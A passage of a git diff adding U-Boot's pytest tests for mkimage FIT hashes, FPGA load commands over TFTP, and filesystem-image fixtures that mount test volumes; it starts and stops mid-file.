fit.change_signature_algo_to_ecdsa() + fit.sign(mkimage, key_file) + fit.check_signatures(key) diff --git a/test/py/tests/test_fit_hashes.py b/test/py/tests/test_fit_hashes.py new file mode 100644 index 00000000000..4891e77ca2d --- /dev/null +++ b/test/py/tests/test_fit_hashes.py @@ -0,0 +1,114 @@ +# SPDX-License-Identifier: GPL-2.0+ +# +# Copyright (c) 2021 Alexandru Gagniuc <mr.nuke.me@gmail.com> + +""" +Check hashes produced by mkimage against known values + +This test checks the correctness of mkimage's hashes. by comparing the mkimage +output of a fixed data block with known good hashes. +This test doesn't run the sandbox. 
It only checks the host tool 'mkimage' +""" + +import os +import pytest +import u_boot_utils as util + +kernel_hashes = { + "sha512" : "f18c1486a2c29f56360301576cdfce4dfd8e8e932d0ed8e239a1f314b8ae1d77b2a58cd7fe32e4075e69448e623ce53b0b6aa6ce5626d2c189a5beae29a68d93", + "sha384" : "16e28976740048485d08d793d8bf043ebc7826baf2bc15feac72825ad67530ceb3d09e0deb6932c62a5a0e9f3936baf4", + "sha256" : "2955c56bc1e5050c111ba6e089e0f5342bb47dedf77d87e3f429095feb98a7e5", + "sha1" : "652383e1a6d946953e1f65092c9435f6452c2ab7", + "md5" : "4879e5086e4c76128e525b5fe2af55f1", + "crc32" : "32eddfdf", + "crc16-ccitt" : "d4be" +} + +class ReadonlyFitImage(object): + """ Helper to manipulate a FIT image on disk """ + def __init__(self, cons, file_name): + self.fit = file_name + self.cons = cons + self.hashable_nodes = set() + + def __fdt_list(self, path): + return util.run_and_log(self.cons, f'fdtget -l {self.fit} {path}') + + def __fdt_get(self, node, prop): + val = util.run_and_log(self.cons, f'fdtget {self.fit} {node} {prop}') + return val.rstrip('\n') + + def __fdt_get_sexadecimal(self, node, prop): + numbers = util.run_and_log(self.cons, f'fdtget -tbx {self.fit} {node} {prop}') + + sexadecimal = '' + for num in numbers.rstrip('\n').split(' '): + sexadecimal += num.zfill(2) + return sexadecimal + + def find_hashable_image_nodes(self): + for node in self.__fdt_list('/images').split(): + # We only have known hashes for the kernel node + if 'kernel' not in node: + continue + self.hashable_nodes.add(f'/images/{node}') + + return self.hashable_nodes + + def verify_hashes(self): + for image in self.hashable_nodes: + algos = set() + for node in self.__fdt_list(image).split(): + if "hash-" not in node: + continue + + raw_hash = self.__fdt_get_sexadecimal(f'{image}/{node}', 'value') + algo = self.__fdt_get(f'{image}/{node}', 'algo') + algos.add(algo) + + good_hash = kernel_hashes[algo] + if good_hash != raw_hash: + raise ValueError(f'{image} Borked hash: {algo}'); + + # Did we test all the hashes we set out to test? + missing_algos = kernel_hashes.keys() - algos + if (missing_algos): + raise ValueError(f'Missing hashes from FIT: {missing_algos}') + + +@pytest.mark.buildconfigspec('hash') +@pytest.mark.requiredtool('dtc') +@pytest.mark.requiredtool('fdtget') +@pytest.mark.requiredtool('fdtput') +def test_mkimage_hashes(u_boot_console): + """ Test that hashes generated by mkimage are correct. 
""" + + def assemble_fit_image(dest_fit, its, destdir): + dtc_args = f'-I dts -O dtb -i {destdir}' + util.run_and_log(cons, [mkimage, '-D', dtc_args, '-f', its, dest_fit]) + + def dtc(dts): + dtb = dts.replace('.dts', '.dtb') + util.run_and_log(cons, f'dtc {datadir}/{dts} -O dtb -o {tempdir}/{dtb}') + + cons = u_boot_console + mkimage = cons.config.build_dir + '/tools/mkimage' + datadir = cons.config.source_dir + '/test/py/tests/vboot/' + tempdir = os.path.join(cons.config.result_dir, 'hashes') + os.makedirs(tempdir, exist_ok=True) + + fit_file = f'{tempdir}/test.fit' + dtc('sandbox-kernel.dts') + + # Create a fake kernel image -- Avoid zeroes or crc16 will be zero + with open(f'{tempdir}/test-kernel.bin', 'w') as fd: + fd.write(500 * chr(0xa5)) + + assemble_fit_image(fit_file, f'{datadir}/hash-images.its', tempdir) + + fit = ReadonlyFitImage(cons, fit_file) + nodes = fit.find_hashable_image_nodes() + if len(nodes) == 0: + raise ValueError('FIT image has no "/image" nodes with "hash-..."') + + fit.verify_hashes() diff --git a/test/py/tests/test_fpga.py b/test/py/tests/test_fpga.py new file mode 100644 index 00000000000..ca7ef8ea40d --- /dev/null +++ b/test/py/tests/test_fpga.py @@ -0,0 +1,565 @@ +# SPDX-License-Identifier: GPL-2.0 +# +# Copyright (c) 2018, Xilinx Inc. +# +# Michal Simek +# Siva Durga Prasad Paladugu + +import pytest +import re +import random +import u_boot_utils + +""" +Note: This test relies on boardenv_* containing configuration values to define +the network available and files to be used for testing. Without this, this test +will be automatically skipped. + +For example: + +# True if a DHCP server is attached to the network, and should be tested. +env__net_dhcp_server = True + +# A list of environment variables that should be set in order to configure a +# static IP. In this test case we atleast need serverip for performing tftpb +# to get required files. +env__net_static_env_vars = [ + ('ipaddr', '10.0.0.100'), + ('netmask', '255.255.255.0'), + ('serverip', '10.0.0.1'), +] + +# Details regarding the files that may be read from a TFTP server. . 
+env__fpga_secure_readable_file = { + 'fn': 'auth_bhdr_ppk1_bit.bin', + 'enckupfn': 'auth_bhdr_enc_kup_load_bit.bin', + 'addr': 0x1000000, + 'keyaddr': 0x100000, + 'keyfn': 'key.txt', +} + +env__fpga_under_test = { + 'dev': 0, + 'addr' : 0x1000000, + 'bitstream_load': 'compress.bin', + 'bitstream_load_size': 1831960, + 'bitstream_loadp': 'compress_pr.bin', + 'bitstream_loadp_size': 423352, + 'bitstream_loadb': 'compress.bit', + 'bitstream_loadb_size': 1832086, + 'bitstream_loadbp': 'compress_pr.bit', + 'bitstream_loadbp_size': 423491, + 'mkimage_legacy': 'download.ub', + 'mkimage_legacy_size': 13321468, + 'mkimage_legacy_gz': 'download.gz.ub', + 'mkimage_legacy_gz_size': 53632, + 'mkimage_fit': 'download-fit.ub', + 'mkimage_fit_size': 13322784, + 'loadfs': 'mmc 0 compress.bin', + 'loadfs_size': 1831960, + 'loadfs_block_size': 0x10000, +} +""" + +import test_net + +def check_dev(u_boot_console): + f = u_boot_console.config.env.get('env__fpga_under_test', None) + if not f: + pytest.skip('No FPGA to test') + + dev = f.get('dev', -1) + if dev < 0: + pytest.fail('No dev specified via env__fpga_under_test') + + return dev, f + +def load_file_from_var(u_boot_console, name): + dev, f = check_dev(u_boot_console) + + addr = f.get('addr', -1) + if addr < 0: + pytest.fail('No address specified via env__fpga_under_test') + + test_net.test_net_dhcp(u_boot_console) + test_net.test_net_setup_static(u_boot_console) + bit = f['%s' % (name)] + bit_size = f['%s_size' % (name)] + + expected_tftp = 'Bytes transferred = %d' % bit_size + output = u_boot_console.run_command('tftpboot %x %s' % (addr, bit)) + assert expected_tftp in output + + return f, dev, addr, bit, bit_size + +###### FPGA FAIL test ###### +expected_usage = 'fpga - loadable FPGA image support' + +@pytest.mark.xfail +@pytest.mark.buildconfigspec('cmd_fpga') +def test_fpga_fail(u_boot_console): + # Test non valid fpga subcommand + expected = 'fpga: non existing command' + output = u_boot_console.run_command('fpga broken 0') + #assert expected in output + assert expected_usage in output + +@pytest.mark.buildconfigspec('cmd_fpga') +def test_fpga_help(u_boot_console): + # Just show help + output = u_boot_console.run_command('fpga') + assert expected_usage in output + + +###### FPGA DUMP tests ###### + +@pytest.mark.buildconfigspec('cmd_fpga') +def test_fpga_dump(u_boot_console): + pytest.skip('Not implemented now') + +@pytest.mark.buildconfigspec('cmd_fpga') +def test_fpga_dump_variable(u_boot_console): + # Same as above but via "fpga" variable + pytest.skip('Not implemented now') + +###### FPGA INFO tests ###### + +@pytest.mark.buildconfigspec('cmd_fpga') +def test_fpga_info_fail(u_boot_console): + # Maybe this can be skipped completely + dev, f = check_dev(u_boot_console) + + # Multiple parameters to fpga info should fail + expected = 'fpga: more parameters passed' + output = u_boot_console.run_command('fpga info 0 0') + #assert expected in output + assert expected_usage in output + +@pytest.mark.buildconfigspec('cmd_fpga') +def test_fpga_info_list(u_boot_console): + # Maybe this can be skipped completely + dev, f = check_dev(u_boot_console) + + # Code is design in a way that if fpga dev is not passed it should + # return list of all fpga devices in the system + u_boot_console.run_command('setenv fpga') + output = u_boot_console.run_command('fpga info') + assert expected_usage not in output + +@pytest.mark.buildconfigspec('cmd_fpga') +def test_fpga_info(u_boot_console): + dev, f = check_dev(u_boot_console) + + output = 
u_boot_console.run_command('fpga info %x' % (dev)) + assert expected_usage not in output + +@pytest.mark.buildconfigspec('cmd_fpga') +def test_fpga_info_variable(u_boot_console): + dev, f = check_dev(u_boot_console) + + # + # fpga variable is storing device number which doesn't need to be passed + # + u_boot_console.run_command('setenv fpga %x' % (dev)) + + output = u_boot_console.run_command('fpga info') + # Variable cleanup + u_boot_console.run_command('setenv fpga') + assert expected_usage not in output + +###### FPGA LOAD tests ###### + +@pytest.mark.buildconfigspec('cmd_fpga') +@pytest.mark.buildconfigspec('cmd_echo') +def test_fpga_load_fail(u_boot_console): + f, dev, addr, bit, bit_size = load_file_from_var(u_boot_console, 'bitstream_load') + + for cmd in ['dump', 'load', 'loadb']: + # missing dev parameter + expected = 'fpga: incorrect parameters passed' + output = u_boot_console.run_command('fpga %s %x $filesize' % (cmd, addr)) + #assert expected in output + assert expected_usage in output + + # more parameters - 0 at the end + expected = 'fpga: more parameters passed' + output = u_boot_console.run_command('fpga %s %x %x $filesize 0' % (cmd, dev, addr)) + #assert expected in output + assert expected_usage in output + + # 0 address + expected = 'fpga: zero fpga_data address' + output = u_boot_console.run_command('fpga %s %x 0 $filesize' % (cmd, dev)) + #assert expected in output + assert expected_usage in output + + # 0 filesize + expected = 'fpga: zero size' + output = u_boot_console.run_command('fpga %s %x %x 0' % (cmd, dev, addr)) + #assert expected in output + assert expected_usage in output + +@pytest.mark.buildconfigspec('cmd_fpga') +@pytest.mark.buildconfigspec('cmd_echo') +def test_fpga_load(u_boot_console): + f, dev, addr, bit, bit_size = load_file_from_var(u_boot_console, 'bitstream_load') + + expected_text = 'FPGA loaded successfully' + output = u_boot_console.run_command('fpga load %x %x $filesize && echo %s' % (dev, addr, expected_text)) + assert expected_text in output + +@pytest.mark.buildconfigspec('cmd_fpga') +@pytest.mark.buildconfigspec('cmd_fpga_loadp') +@pytest.mark.buildconfigspec('cmd_echo') +def test_fpga_loadp(u_boot_console): + f, dev, addr, bit, bit_size = load_file_from_var(u_boot_console, 'bitstream_load') + + expected_text = 'FPGA loaded successfully' + output = u_boot_console.run_command('fpga load %x %x $filesize && echo %s' % (dev, addr, expected_text)) + assert expected_text in output + + # And load also partial bistream + f, dev, addr, bit, bit_size = load_file_from_var(u_boot_console, 'bitstream_loadp') + + expected_text = 'FPGA loaded successfully' + output = u_boot_console.run_command('fpga loadp %x %x $filesize && echo %s' % (dev, addr, expected_text)) + assert expected_text in output + +@pytest.mark.buildconfigspec('cmd_fpga') +@pytest.mark.buildconfigspec('cmd_echo') +def test_fpga_loadb(u_boot_console): + f, dev, addr, bit, bit_size = load_file_from_var(u_boot_console, 'bitstream_loadb') + + expected_text = 'FPGA loaded successfully' + output = u_boot_console.run_command('fpga loadb %x %x $filesize && echo %s' % (dev, addr, expected_text)) + assert expected_text in output + +@pytest.mark.buildconfigspec('cmd_fpga') +@pytest.mark.buildconfigspec('cmd_fpga_loadbp') +@pytest.mark.buildconfigspec('cmd_echo') +def test_fpga_loadbp(u_boot_console): + f, dev, addr, bit, bit_size = load_file_from_var(u_boot_console, 'bitstream_loadb') + + expected_text = 'FPGA loaded successfully' + output = u_boot_console.run_command('fpga loadb %x %x $filesize && 
echo %s' % (dev, addr, expected_text)) + assert expected_text in output + + # And load also partial bistream in bit format + f, dev, addr, bit, bit_size = load_file_from_var(u_boot_console, 'bitstream_loadbp') + + expected_text = 'FPGA loaded successfully' + output = u_boot_console.run_command('fpga loadbp %x %x $filesize && echo %s' % (dev, addr, expected_text)) + assert expected_text in output + +###### FPGA LOADMK tests ###### + +@pytest.mark.buildconfigspec('cmd_fpga') +@pytest.mark.buildconfigspec('cmd_fpga_loadmk') +@pytest.mark.buildconfigspec('cmd_echo') +@pytest.mark.buildconfigspec('image_format_legacy') +def test_fpga_loadmk_fail(u_boot_console): + f, dev, addr, bit, bit_size = load_file_from_var(u_boot_console, 'mkimage_legacy') + + u_boot_console.run_command('imi %x' % (addr)) + + # load image but pass incorrect address to show error message + expected = 'Unknown image type' + output = u_boot_console.run_command('fpga loadmk %x %x' % (dev, addr + 0x10)) + assert expected in output + + # Pass more parameters then command expects - 0 at the end + output = u_boot_console.run_command('fpga loadmk %x %x 0' % (dev, addr)) + #assert expected in output + assert expected_usage in output + +@pytest.mark.buildconfigspec('cmd_fpga') +@pytest.mark.buildconfigspec('cmd_fpga_loadmk') +@pytest.mark.buildconfigspec('cmd_echo') +@pytest.mark.buildconfigspec('image_format_legacy') +def test_fpga_loadmk_legacy(u_boot_console): + f, dev, addr, bit, bit_size = load_file_from_var(u_boot_console, 'mkimage_legacy') + + u_boot_console.run_command('imi %x' % (addr)) + + expected_text = 'FPGA loaded successfully' + output = u_boot_console.run_command('fpga loadmk %x %x && echo %s' % (dev, addr, expected_text)) + assert expected_text in output + +@pytest.mark.xfail +@pytest.mark.buildconfigspec('cmd_fpga') +@pytest.mark.buildconfigspec('cmd_fpga_loadmk') +@pytest.mark.buildconfigspec('cmd_echo') +@pytest.mark.buildconfigspec('image_format_legacy') +def test_fpga_loadmk_legacy_variable_fpga(u_boot_console): + f, dev, addr, bit, bit_size = load_file_from_var(u_boot_console, 'mkimage_legacy') + + u_boot_console.run_command('imi %x' % (addr)) + + u_boot_console.run_command('setenv fpga %x' % (dev)) + + # this testcase should cover case which looks like it is supported but dev pointer is broken by loading mkimage address + expected_text = 'FPGA loaded successfully' + output = u_boot_console.run_command('fpga loadmk %x && echo %s' % (addr, expected_text)) + u_boot_console.run_command('setenv fpga') + assert expected_text in output + +@pytest.mark.buildconfigspec('cmd_fpga') +@pytest.mark.buildconfigspec('cmd_fpga_loadmk') +@pytest.mark.buildconfigspec('cmd_echo') +@pytest.mark.buildconfigspec('image_format_legacy') +def test_fpga_loadmk_legacy_variable_fpgadata(u_boot_console): + f, dev, addr, bit, bit_size = load_file_from_var(u_boot_console, 'mkimage_legacy') + + u_boot_console.run_command('imi %x' % (addr)) + + u_boot_console.run_command('setenv fpgadata %x' % (addr)) + + # this testcase should cover case which looks like it is supported but dev pointer is broken by loading mkimage address + expected_text = 'FPGA loaded successfully' + output = u_boot_console.run_command('fpga loadmk %x && echo %s' % (dev, expected_text)) + u_boot_console.run_command('setenv fpgadata') + assert expected_text in output + +@pytest.mark.buildconfigspec('cmd_fpga') +@pytest.mark.buildconfigspec('cmd_fpga_loadmk') +@pytest.mark.buildconfigspec('cmd_echo') +@pytest.mark.buildconfigspec('image_format_legacy') +def 
test_fpga_loadmk_legacy_variable(u_boot_console): + f, dev, addr, bit, bit_size = load_file_from_var(u_boot_console, 'mkimage_legacy') + + u_boot_console.run_command('imi %x' % (addr)) + + u_boot_console.run_command('setenv fpga %x' % (dev)) + u_boot_console.run_command('setenv fpgadata %x' % (addr)) + + # this testcase should cover case which looks like it is supported but dev pointer is broken by loading mkimage address + expected_text = 'FPGA loaded successfully' + output = u_boot_console.run_command('fpga loadmk && echo %s' % (expected_text)) + u_boot_console.run_command('setenv fpga') + u_boot_console.run_command('setenv fpgadata') + assert expected_text in output + +@pytest.mark.buildconfigspec('cmd_fpga') +@pytest.mark.buildconfigspec('cmd_fpga_loadmk') +@pytest.mark.buildconfigspec('cmd_echo') +@pytest.mark.buildconfigspec('image_format_legacy') +@pytest.mark.buildconfigspec('gzip') +def test_fpga_loadmk_legacy_gz(u_boot_console): + f, dev, addr, bit, bit_size = load_file_from_var(u_boot_console, 'mkimage_legacy_gz') + + u_boot_console.run_command('imi %x' % (addr)) + + expected_text = 'FPGA loaded successfully' + output = u_boot_console.run_command('fpga loadmk %x %x && echo %s' % (dev, addr, expected_text)) + assert expected_text in output + +@pytest.mark.buildconfigspec('cmd_fpga') +@pytest.mark.buildconfigspec('cmd_fpga_loadmk') +@pytest.mark.buildconfigspec('fit') +@pytest.mark.buildconfigspec('cmd_echo') +def test_fpga_loadmk_fit_external(u_boot_console): + f, dev, addr, bit, bit_size = load_file_from_var(u_boot_console, 'mkimage_fit_external') + + u_boot_console.run_command('imi %x' % (addr)) + + expected_text = 'FPGA loaded successfully' + output = u_boot_console.run_command('fpga loadmk %x %x:fpga && echo %s' % (dev, addr, expected_text)) + assert expected_text in output + +@pytest.mark.buildconfigspec('cmd_fpga') +@pytest.mark.buildconfigspec('cmd_fpga_loadmk') +@pytest.mark.buildconfigspec('fit') +@pytest.mark.buildconfigspec('cmd_echo') +def test_fpga_loadmk_fit(u_boot_console): + f, dev, addr, bit, bit_size = load_file_from_var(u_boot_console, 'mkimage_fit') + + u_boot_console.run_command('imi %x' % (addr)) + + expected_text = 'FPGA loaded successfully' + output = u_boot_console.run_command('fpga loadmk %x %x:fpga && echo %s' % (dev, addr, expected_text)) + assert expected_text in output + +@pytest.mark.buildconfigspec('cmd_fpga') +@pytest.mark.buildconfigspec('cmd_fpga_loadmk') +@pytest.mark.buildconfigspec('fit') +@pytest.mark.buildconfigspec('cmd_echo') +def test_fpga_loadmk_fit_variable_fpga(u_boot_console): + f, dev, addr, bit, bit_size = load_file_from_var(u_boot_console, 'mkimage_fit') + + u_boot_console.run_command('imi %x' % (addr)) + # FIXME this should fail - broken support in past + u_boot_console.run_command('setenv fpga %x' % (dev)) + + expected_text = 'FPGA loaded successfully' + output = u_boot_console.run_command('fpga loadmk %x:fpga && echo %s' % (addr, expected_text)) + u_boot_console.run_command('setenv fpga') + assert expected_text in output + +@pytest.mark.buildconfigspec('cmd_fpga') +@pytest.mark.buildconfigspec('cmd_fpga_loadmk') +@pytest.mark.buildconfigspec('fit') +@pytest.mark.buildconfigspec('cmd_echo') +def test_fpga_loadmk_fit_variable_fpgadata(u_boot_console): + f, dev, addr, bit, bit_size = load_file_from_var(u_boot_console, 'mkimage_fit') + + u_boot_console.run_command('imi %x' % (addr)) + # FIXME this should fail - broken support in past + u_boot_console.run_command('setenv fpgadata %x:fpga' % (addr)) + + expected_text = 'FPGA loaded 
successfully' + output = u_boot_console.run_command('fpga loadmk %x && echo %s' % (dev, expected_text)) + u_boot_console.run_command('setenv fpgadata') + assert expected_text in output + +@pytest.mark.buildconfigspec('cmd_fpga') +@pytest.mark.buildconfigspec('cmd_fpga_loadmk') +@pytest.mark.buildconfigspec('fit') +@pytest.mark.buildconfigspec('cmd_echo') +def test_fpga_loadmk_fit_variable(u_boot_console): + f, dev, addr, bit, bit_size = load_file_from_var(u_boot_console, 'mkimage_fit') + + u_boot_console.run_command('imi %x' % (addr)) + + u_boot_console.run_command('setenv fpga %x' % (dev)) + u_boot_console.run_command('setenv fpgadata %x:fpga' % (addr)) + + expected_text = 'FPGA loaded successfully' + output = u_boot_console.run_command('fpga loadmk && echo %s' % (expected_text)) + u_boot_console.run_command('setenv fpga') + u_boot_console.run_command('setenv fpgadata') + assert expected_text in output + +###### FPGA LOAD tests ###### + +@pytest.mark.buildconfigspec('cmd_fpga') +def test_fpga_loadfs_fail(u_boot_console): + dev, f = check_dev(u_boot_console) + + addr = f.get('addr', -1) + if addr < 0: + pytest.fail('No address specified via env__fpga_under_test') + + bit = f['loadfs'] + bit_size = f['loadfs_size'] + block_size = f['loadfs_block_size'] + + # less params - dev number removed + expected = 'fpga: incorrect parameters passed' + output = u_boot_console.run_command('fpga loadfs %x %x %x %s' % (addr, bit_size, block_size, bit)) + #assert expected in output + assert expected_usage in output + + # one more param - 0 at the end + # This is the longest command that's why there is no message from cmd/fpga.c + output = u_boot_console.run_command('fpga loadfs %x %x %x %x %s 0' % (dev, addr, bit_size, block_size, bit)) + assert expected_usage in output + + # zero address 0 + expected = 'fpga: zero fpga_data address' + output = u_boot_console.run_command('fpga loadfs %x %x %x %x %s' % (dev, 0, bit_size, block_size, bit)) + #assert expected in output + assert expected_usage in output + + # bit_size 0 + expected = 'fpga: zero size' + output = u_boot_console.run_command('fpga loadfs %x %x %x %x %s' % (dev, addr, 0, block_size, bit)) + #assert expected in output + assert expected_usage in output + + # block size 0 + # FIXME this should pass but it failing too + output = u_boot_console.run_command('fpga loadfs %x %x %x %x %s' % (dev, addr, bit_size, 0, bit)) + assert expected_usage in output + + # non existing bitstream name + expected = 'Unable to read file noname' + output = u_boot_console.run_command('fpga loadfs %x %x %x %x mmc 0 noname' % (dev, addr, bit_size, block_size)) + assert expected in output + assert expected_usage in output + + # -1 dev number + expected = 'fpga_fsload: Invalid device number -1' + output = u_boot_console.run_command('fpga loadfs %d %x %x %x mmc 0 noname' % (-1, addr, bit_size, block_size)) + assert expected in output + assert expected_usage in output + + +@pytest.mark.buildconfigspec('cmd_fpga') +@pytest.mark.buildconfigspec('cmd_echo') +def test_fpga_loadfs(u_boot_console): + dev, f = check_dev(u_boot_console) + + addr = f.get('addr', -1) + if addr < 0: + pytest.fail('No address specified via env__fpga_under_test') + + bit = f['loadfs'] + bit_size = f['loadfs_size'] + block_size = f['loadfs_block_size'] + + # This should be done better + expected_text = 'FPGA loaded successfully' + output = u_boot_console.run_command('fpga loadfs %x %x %x %x %s && echo %s' % (dev, addr, bit_size, block_size, bit, expected_text)) + assert expected_text in output + 
+@pytest.mark.buildconfigspec('cmd_fpga') +@pytest.mark.buildconfigspec('cmd_fpga_load_secure') +@pytest.mark.buildconfigspec('cmd_net') +@pytest.mark.buildconfigspec('cmd_dhcp') +@pytest.mark.buildconfigspec('net') +def test_fpga_secure_bit_auth(u_boot_console): + + test_net.test_net_dhcp(u_boot_console) + test_net.test_net_setup_static(u_boot_console) + + f = u_boot_console.config.env.get('env__fpga_secure_readable_file', None) + if not f: + pytest.skip('No TFTP readable file to read') + + addr = f.get('addr', None) + if not addr: + addr = u_boot_utils.find_ram_base(u_boot_console) + + expected_tftp = 'Bytes transferred = ' + fn = f['fn'] + output = u_boot_console.run_command('tftpboot %x %s' % (addr, fn)) + assert expected_tftp in output + + expected_zynqmpsecure = 'Bitstream successfully loaded' + output = u_boot_console.run_command('fpga loads 0 %x $filesize 0 2' % (addr)) + assert expected_zynqmpsecure in output + + +@pytest.mark.buildconfigspec('cmd_fpga') +@pytest.mark.buildconfigspec('cmd_fpga_load_secure') +@pytest.mark.buildconfigspec('cmd_net') +@pytest.mark.buildconfigspec('cmd_dhcp') +@pytest.mark.buildconfigspec('net') +def test_fpga_secure_bit_img_auth_kup(u_boot_console): + + test_net.test_net_dhcp(u_boot_console) + test_net.test_net_setup_static(u_boot_console) + + f = u_boot_console.config.env.get('env__fpga_secure_readable_file', None) + if not f: + pytest.skip('No TFTP readable file to read') + + keyaddr = f.get('keyaddr', None) + if not keyaddr: + addr = u_boot_utils.find_ram_base(u_boot_console) + expected_tftp = 'Bytes transferred = ' + keyfn = f['keyfn'] + output = u_boot_console.run_command('tftpboot %x %s' % (keyaddr, keyfn)) + assert expected_tftp in output + + addr = f.get('addr', None) + if not addr: + addr = u_boot_utils.find_ram_base(u_boot_console) + expected_tftp = 'Bytes transferred = ' + fn = f['enckupfn'] + output = u_boot_console.run_command('tftpboot %x %s' % (addr, fn)) + assert expected_tftp in output + + expected_zynqmpsecure = 'Bitstream successfully loaded' + output = u_boot_console.run_command('fpga loads 0 %x $filesize 0 1 %x' % (addr, keyaddr)) + assert expected_zynqmpsecure in output diff --git a/test/py/tests/test_fs/conftest.py b/test/py/tests/test_fs/conftest.py new file mode 100644 index 00000000000..fca54488374 --- /dev/null +++ b/test/py/tests/test_fs/conftest.py @@ -0,0 +1,674 @@ +# SPDX-License-Identifier: GPL-2.0+ +# Copyright (c) 2018, Linaro Limited +# Author: Takahiro Akashi <takahiro.akashi@linaro.org> + +import os +import os.path +import pytest +import re +from subprocess import call, check_call, check_output, CalledProcessError +from fstest_defs import * +import u_boot_utils as util +# pylint: disable=E0611 +from tests import fs_helper + +supported_fs_basic = ['fat16', 'fat32', 'ext4'] +supported_fs_ext = ['fat12', 'fat16', 'fat32'] +supported_fs_fat = ['fat12', 'fat16'] +supported_fs_mkdir = ['fat12', 'fat16', 'fat32'] +supported_fs_unlink = ['fat12', 'fat16', 'fat32'] +supported_fs_symlink = ['ext4'] + +# +# Filesystem test specific setup +# +def pytest_addoption(parser): + """Enable --fs-type option. + + See pytest_configure() about how it works. + + Args: + parser: Pytest command-line parser. + + Returns: + Nothing. + """ + parser.addoption('--fs-type', action='append', default=None, + help='Targeting Filesystem Types') + +def pytest_configure(config): + """Restrict a file system(s) to be tested. + + A file system explicitly named with --fs-type option is selected + if it belongs to a default supported_fs_xxx list. 
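+    For example, an illustrative way to restrict a run to FAT32 and ext4 (to
+    be combined with whatever other options a particular setup needs) is:
+
+        --fs-type fat32 --fs-type ext4
+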
+ Multiple options can be specified. + + Args: + config: Pytest configuration. + + Returns: + Nothing. + """ + global supported_fs_basic + global supported_fs_ext + global supported_fs_fat + global supported_fs_mkdir + global supported_fs_unlink + global supported_fs_symlink + + def intersect(listA, listB): + return [x for x in listA if x in listB] + + supported_fs = config.getoption('fs_type') + if supported_fs: + print('*** FS TYPE modified: %s' % supported_fs) + supported_fs_basic = intersect(supported_fs, supported_fs_basic) + supported_fs_ext = intersect(supported_fs, supported_fs_ext) + supported_fs_fat = intersect(supported_fs, supported_fs_fat) + supported_fs_mkdir = intersect(supported_fs, supported_fs_mkdir) + supported_fs_unlink = intersect(supported_fs, supported_fs_unlink) + supported_fs_symlink = intersect(supported_fs, supported_fs_symlink) + +def pytest_generate_tests(metafunc): + """Parametrize fixtures, fs_obj_xxx + + Each fixture will be parametrized with a corresponding support_fs_xxx + list. + + Args: + metafunc: Pytest test function. + + Returns: + Nothing. + """ + if 'fs_obj_basic' in metafunc.fixturenames: + metafunc.parametrize('fs_obj_basic', supported_fs_basic, + indirect=True, scope='module') + if 'fs_obj_ext' in metafunc.fixturenames: + metafunc.parametrize('fs_obj_ext', supported_fs_ext, + indirect=True, scope='module') + if 'fs_obj_fat' in metafunc.fixturenames: + metafunc.parametrize('fs_obj_fat', supported_fs_fat, + indirect=True, scope='module') + if 'fs_obj_mkdir' in metafunc.fixturenames: + metafunc.parametrize('fs_obj_mkdir', supported_fs_mkdir, + indirect=True, scope='module') + if 'fs_obj_unlink' in metafunc.fixturenames: + metafunc.parametrize('fs_obj_unlink', supported_fs_unlink, + indirect=True, scope='module') + if 'fs_obj_symlink' in metafunc.fixturenames: + metafunc.parametrize('fs_obj_symlink', supported_fs_symlink, + indirect=True, scope='module') + +# +# Helper functions +# +def fstype_to_ubname(fs_type): + """Convert a file system type to an U-Boot specific string + + A generated string can be used as part of file system related commands + or a config name in u-boot. Currently fat16 and fat32 are handled + specifically. + + Args: + fs_type: File system type. + + Return: + A corresponding string for file system type. + """ + if re.match('fat', fs_type): + return 'fat' + else: + return fs_type + +def check_ubconfig(config, fs_type): + """Check whether a file system is enabled in u-boot configuration. + + This function is assumed to be called in a fixture function so that + the whole test cases will be skipped if a given file system is not + enabled. + + Args: + fs_type: File system type. + + Return: + Nothing. + """ + if not config.buildconfig.get('config_cmd_%s' % fs_type, None): + pytest.skip('.config feature "CMD_%s" not enabled' % fs_type.upper()) + if not config.buildconfig.get('config_%s_write' % fs_type, None): + pytest.skip('.config feature "%s_WRITE" not enabled' + % fs_type.upper()) + +# from test/py/conftest.py +def tool_is_in_path(tool): + """Check whether a given command is available on host. + + Args: + tool: Command name. + + Return: + True if available, False if not. + """ + for path in os.environ['PATH'].split(os.pathsep): + fn = os.path.join(path, tool) + if os.path.isfile(fn) and os.access(fn, os.X_OK): + return True + return False + +fuse_mounted = False + +def mount_fs(fs_type, device, mount_point): + """Mount a volume. + + Args: + fs_type: File system type. + device: Volume's file name. + mount_point: Mount point. 
+ + Return: + Nothing. + """ + global fuse_mounted + + try: + check_call('guestmount --pid-file guestmount.pid -a %s -m /dev/sda %s' + % (device, mount_point), shell=True) + fuse_mounted = True + return + except CalledProcessError: + fuse_mounted = False + + mount_opt = 'loop,rw' + if re.match('fat', fs_type): + mount_opt += ',umask=0000' + + check_call('sudo mount -o %s %s %s' + % (mount_opt, device, mount_point), shell=True) + + # may not be effective for some file systems + check_call('sudo chmod a+rw %s' % mount_point, shell=True) + +def umount_fs(mount_point): + """Unmount a volume. + + Args: + mount_point: Mount point. + + Return: + Nothing. + """ + if fuse_mounted: + call('sync') + call('guestunmount %s' % mount_point, shell=True) + + try: + with open("guestmount.pid", "r") as pidfile: + pid = int(pidfile.read()) + util.waitpid(pid, kill=True) + os.remove("guestmount.pid") + + except FileNotFoundError: + pass + + else: + call('sudo umount %s' % mount_point, shell=True) + +# +# Fixture for basic fs test +# derived from test/fs/fs-test.sh +# +@pytest.fixture() +def fs_obj_basic(request, u_boot_config): + """Set up a file system to be used in basic fs test. + + Args: + request: Pytest request object. + u_boot_config: U-Boot configuration. + + Return: + A fixture for basic fs test, i.e. a triplet of file system type, + volume file name and a list of MD5 hashes. + """ + fs_type = request.param + fs_img = '' + + fs_ubtype = fstype_to_ubname(fs_type) + check_ubconfig(u_boot_config, fs_ubtype) + + mount_dir = u_boot_config.persistent_data_dir + '/mnt' + + small_file = mount_dir + '/' + SMALL_FILE + big_file = mount_dir + '/' + BIG_FILE + + try: + + # 3GiB volume + fs_img = fs_helper.mk_fs(u_boot_config, fs_type, 0xc0000000, '3GB') + except CalledProcessError as err: + pytest.skip('Creating failed for filesystem: ' + fs_type + '. {}'.format(err)) + return + + try: + check_call('mkdir -p %s' % mount_dir, shell=True) + except CalledProcessError as err: + pytest.skip('Preparing mount folder failed for filesystem: ' + fs_type + '. {}'.format(err)) + call('rm -f %s' % fs_img, shell=True) + return + + try: + # Mount the image so we can populate it. + mount_fs(fs_type, fs_img, mount_dir) + except CalledProcessError as err: + pytest.skip('Mounting to folder failed for filesystem: ' + fs_type + '. {}'.format(err)) + call('rmdir %s' % 